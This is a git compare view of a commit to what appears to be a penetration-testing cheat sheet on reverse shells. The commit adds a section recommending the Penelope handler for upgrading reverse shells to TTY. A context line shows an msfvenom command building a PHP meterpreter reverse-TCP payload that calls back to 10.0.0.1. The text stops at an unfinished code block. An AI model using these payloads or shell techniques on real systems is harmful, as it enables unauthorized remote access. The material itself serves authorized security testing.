Compare commits

...

2 Commits

Author SHA1 Message Date
brightio 5c688ba256
Merge dac7726f6e into d07e3a2727 2024-10-05 23:49:36 +05:30
brightio dac7726f6e
Add spawning TTY shell method 2024-09-15 12:56:25 +02:00
1 changed files with 9 additions and 0 deletions

View File

@ -522,6 +522,15 @@ $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > s
## Spawn TTY Shell
The best and most efficient way to get a TTY shell is to use Penelope shell handler as a listener. (https://github.com/brightio/penelope)
![penelope](https://github.com/user-attachments/assets/64a8c88d-0940-4b57-be02-0bb1a445d6c6)
It automatically upgrades Linux reverse shells to TTY, handles the terminal size, logs everything and much more. Also it provides readline support for Windows shells.
### Alternative manual ways
In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`.
```powershell